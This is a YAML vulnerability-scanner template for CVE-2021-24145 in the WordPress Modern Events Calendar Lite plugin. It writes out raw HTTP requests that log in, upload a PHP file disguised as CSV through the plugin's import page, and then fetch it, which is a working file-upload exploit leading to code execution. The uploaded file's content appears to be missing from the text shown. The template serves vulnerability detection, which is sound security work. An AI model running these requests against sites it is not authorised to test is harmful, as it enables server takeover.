id: CVE-2021-24145 info: name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload author: theamanrawat severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. impact: | Remote code execution remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip - https://github.com/dnr6419/CVE-2021-24145 - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 epss-score: 0.94936 epss-percentile: 0.99118 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 3 vendor: webnus product: modern_events_calendar_lite framework: wordpress tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - | POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875 -----------------------------132370916641787807752589698875 Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php" Content-Type: text/csv -----------------------------132370916641787807752589698875 Content-Disposition: form-data; name="mec-ix-action" import-start-bookings -----------------------------132370916641787807752589698875-- - | GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, 'CVE-2021-24145') condition: and # digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950